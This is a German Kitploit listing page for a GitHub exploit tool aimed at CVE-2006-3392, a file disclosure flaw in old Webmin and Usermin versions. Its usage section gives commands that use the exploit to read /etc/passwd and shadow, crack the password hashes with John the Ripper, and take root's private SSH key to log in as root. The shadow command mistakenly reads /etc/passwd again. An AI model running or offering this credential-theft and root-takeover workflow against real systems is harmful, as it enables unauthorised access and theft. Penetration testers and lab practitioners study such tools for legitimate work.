Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2006-3392 — Webmin < 1.290 / Usermin < 1.220 - Beliebige Datei-Offenlegung | Kitploit
Tools/GitHubGitHub/g1vi/cve-2006-3392
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubg1vi/cve-2006-3392

CVE-2006-3392

Webmin < 1.290 / Usermin < 1.220 - Beliebige Datei-Offenlegung

Repository anzeigen
12vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

Webmin vor Version 1.290 und Usermin vor Version 1.220 rufen die Funktion simplify_path vor dem Dekodieren von HTML auf, was es entfernten Angreifern ermöglicht, beliebige Dateien zu lesen, wie anhand von "..%01"-Sequenzen demonstriert wird, welche die Entfernung von "../"-Sequenzen umgehen, bevor Bytes wie "%01" aus dem Dateinamen entfernt werden. HINWEIS: Dies ist ein anderes Problem als CVE-2006-3274.

Nutzung

Durchsuchen Sie jede Datei im Dateisystem mit root-Berechtigung

root@kitploit:~
./exploit.sh <target ip> <target port> <file to disclose>

Beispiele

Durchsuchen Sie passwd und shadow auf 10.10.11.105, ent-schatten und knacken Sie die Hashes

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed

Durchsuchen Sie privaten RSA-Schlüssel auf 10.10.11.105

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]

Lizenz

Sie können es jederzeit und überall nach Belieben verwenden oder modifizieren.

Tool herunterladen